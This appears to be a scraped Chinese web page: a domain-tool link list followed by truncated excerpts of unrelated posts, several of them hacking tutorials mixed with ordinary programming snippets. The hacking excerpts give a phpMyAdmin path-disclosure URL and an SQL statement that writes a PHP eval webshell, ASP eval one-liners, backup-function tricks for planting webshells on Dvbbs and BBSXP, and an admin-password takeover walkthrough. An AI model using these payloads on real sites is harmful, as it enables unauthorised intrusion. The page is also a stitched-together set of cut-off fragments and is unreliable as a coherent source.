新网域名管理·新网互联域名管理·商务中国域名管理·中国频道域名管理·Enom域名管理·万网域名管理·中资源·删除域名检索·each交易论坛·名协论坛·商务中国域名管理·中国频道域名管理·Enom域名管理·each交易论坛·alexa.com世界排名查询·查询一个ip上网站列表·域名批量查询·dnform世界中心·域名主机大全·常用软件下载·域名删除·世界域名交易中心·speednames.com·DNHOT域名热点·UIU精品域名销售·新网信海域名管理·查询ip上的域名列表·国内域名注册信息查询·国际域名注册信息查询·ip地址查询·中国域名信息网·dnforum.com·domainstate...

1.如何拿到登陆密码. 自己想办法 2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.3.选择一个Database.运行以下语句.----start code---Create TABLE a (cmd text NOT NULL);Insert INTO a (cmd) VALUES(’<?php eval($_POST[1]);?>...

遇一BBSXP后台:查看源文件.也没有value可以自定义.尝试修改上传类型.无奈不支持phpaspx.向数据库里插入一句话再备份.出现些XXX估计表里加入了什么东..访问:/bbs/Admin_fso.asp?menu=files&dir=../可以看到整站文件..找到一个文件名不常见的后台..运气不错.备份webshell之.....

实现功能不难，想要完善，甚至完美，那才叫难。所以，小弟将功能实现帖出来，和各位初学者讨论讨论。至于完善，就看各位自己的想法了一、建立数据库在就开始了，我建了一个名为windsn.mdb的数据库，包含4张表admin表（用于管理员信息）：id,name(用户名),pwd(密码),...concent表（用于存放文档数据）：con_id,title,author,part,con,time,numcon_id自动编号title文章标题author作者或出处part文章分类con文章内容time发表时间（用=now()做初始值）num被阅次数part表（用于存放文档分类数据）：id,part(分类)...

一.LoadVars篇  我之所以把XML也放在这里说,是因为XML和LoadVars数据交互的方式大体相同,就是传递时的数据内容有点不一样而已!   我现在列出在开发过程最常用的"用户密码验证"实例,加以说明![code]//=======================================================; // Flash代码; //=======================================================;//定义LoadVars对象;var&...

转自：http://www.wrsky.com/read.php?tid=565作者：firefox+lvhuana今天上午上网的时候，非常无聊，好友都不在线。正在无聊的时候，突然qq响了，一个陌生人要加我，顺便先看下他的资料，哦哦，原来这个人还有个人站点呢，通过他加我请求。然后开始看他的个人站点，原来是一个外挂站，晕糊中，外挂站点的人加我作什么。。。。想想进他的站点看看吧，打开明小子的旁注工具2.2版本（这个启动速度快，我喜欢），扫了一下，看到他站点所在的服务器上面还有几个站点，再仔细扫了一下，发现一个dvbbs7.1的论坛的数据库是默认的dvbbs7.mdb，下载之，然后杀毒软件查下没有木...

五一前写了个小东西：Cver链接见：http://ghost.toyak.com/blog/article.asp?id=215用cver发布漫画集的例子：http://ghost.toyak.com/blog/article.asp?id=216应用实例一应用实例二Cver的开发初衷是为了在网上看漫画CforComicVerforViewer（应某动漫站的需求，希望做到跟物志一样好的用户体验）。开始分析需求的时候，决定把这个viewer做成类似物志的引擎，也就是说，功能不仅仅只是为了看漫画了。当然，我个人非常讨厌那种按钮满天飞、功能列表一大堆其实用户却只会觉得繁琐的应用，所以Cver不仅在面...

 主要是利用后台对access数据库的“备份数据库”或“恢复数据库”功能，“备份的数据库路径”等变量没有过滤导致可以把任意文件后缀改为asp，从而得到webshell，msssql版的程序就直接应用了access版的代码，导致sql版照样可以利用。具体方法和分析可以参考angel的文章《动网论坛7.0获得WebShell的分析》。据我所知，目前还有很多的asp程序后台存在这样的漏洞，利用方法大同小异。   php+mysql程序   ① 利用后台的数据查询功能   　　在有的程序后台提...

来源:邪恶八进制  作者:9xiao    引用最新海洋顶端eval版中的几句话，这里要用到的是<%eval request(chr(35))%>， "evalExecutePP.htm的文本框里自己写的代码就是添用2006X2.exe转换后生成的那个html文本框里的代码。什么是文本框大家知道吧？不知的就去查查html吧。这样添好了，就可以用自己的做的c端了。如果不会，你就用我的那个现成的“2006c端的例子.htm”吧。 S端是<%eval(request("#&...

先注册个号，进入控制面版给自己发条短信  http://127.0.0.1/User/User_Message.asp?Action=Del&ManageType=Inbox&MessageID=4  这就是点```  用户名为admin  奇怪``抓不到```好了抓到了~~~显示记录不存在``是因为  =没有登陆````ef0020cf8c5e45b9 密码是这个```  下面就开始将管理员的密码更新为我注册用户的密码````  ...

本文已经发表于《黑客手册》（非安全）杂志上，版权归其所有！转载注名！ 其实ASP论坛中，我最喜欢就是leadbbs，稳定、速度快，占的空间也不大，比起庞大的DVBBS可小多了，说起安全来，它也很不错的，虽然在早版本里有过可以修改管理员密码的漏洞（俗称移花接木），但是从那至今它的安全性还是非常可以让大家肯定的，可能你会说前几天开始闹cookie欺骗漏洞呢，但是这最多也只是进了前台，后台一般还是无能为力的，高手在其面前也不得不服啊。呵呵，上面是题外话，今天我不是详说它安全性的，{www.xker.com}而是谈一个已经得到有leadbbs论坛网站的webshell了，如何更加方便的进后台...